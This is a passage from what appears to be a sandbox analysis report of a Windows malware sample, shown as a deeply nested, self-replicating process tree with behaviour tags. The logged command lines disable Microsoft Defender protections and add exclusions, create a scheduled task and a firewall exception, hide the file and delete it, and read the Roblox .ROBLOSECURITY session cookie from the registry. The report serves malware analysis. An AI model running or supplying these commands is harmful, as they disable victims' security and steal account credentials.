        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2632
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2176
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1588
- - C:\Users\Admin\AppData\Local\Temp\Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2128
  - - C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
      4⤵
      Views/modifies file attributes
      PID:1992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:484
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1248
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2916
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1192
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2300
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1644
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:2284
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:912
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2800
    - - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2480
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
      4⤵
      Executes dropped EXE
      PID:2752
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2080
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        Executes dropped EXE
        
        PID:888
      - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1996
      - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
    - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        5⤵
        Executes dropped EXE
        
        PID:3008
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:2332
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        Executes dropped EXE
        
        PID:2988
        
        C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1556
        
        C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        7⤵
        Executes dropped EXE
        
        PID:1088
      - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        6⤵
        Executes dropped EXE
        
        PID:2512
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        Executes dropped EXE
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1460
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:2136
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        8⤵
        Views/modifies file attributes
        
        PID:2104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2200
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        8⤵
        
        PID:3000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        8⤵
        
        PID:2204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:2620
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2584
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        Executes dropped EXE
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        8⤵
        Executes dropped EXE
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        9⤵
        Executes dropped EXE
        
        PID:716
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        Executes dropped EXE
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        10⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2088
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        11⤵
        Views/modifies file attributes
        
        PID:2644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2788
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:1972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:2364
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:1916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:2204
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:568
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        Executes dropped EXE
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        11⤵
        Executes dropped EXE
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        Executes dropped EXE
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        12⤵
        Executes dropped EXE
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        Executes dropped EXE
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        13⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:1728
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        14⤵
        Views/modifies file attributes
        
        PID:2144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:704
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        14⤵
        
        PID:1644
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        14⤵
        
        PID:2876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:1688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        14⤵
        Detects videocard installed
        
        PID:1484
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2040
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        Executes dropped EXE
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        14⤵
        Executes dropped EXE
        
        PID:604
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        Executes dropped EXE
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        15⤵
        Executes dropped EXE
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        15⤵
        Executes dropped EXE
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        Executes dropped EXE
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        16⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1716
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:1252
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        17⤵
        Views/modifies file attributes
        
        PID:2820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:3008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:2380
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2136
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:1888
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2460
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        Executes dropped EXE
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        17⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        17⤵
        Executes dropped EXE
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        17⤵
        Executes dropped EXE
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        18⤵
        Executes dropped EXE
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        18⤵
        Executes dropped EXE
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        19⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:2644
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        20⤵
        Views/modifies file attributes
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        20⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        20⤵
        
        PID:2172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        20⤵
        
        PID:1452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:2752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
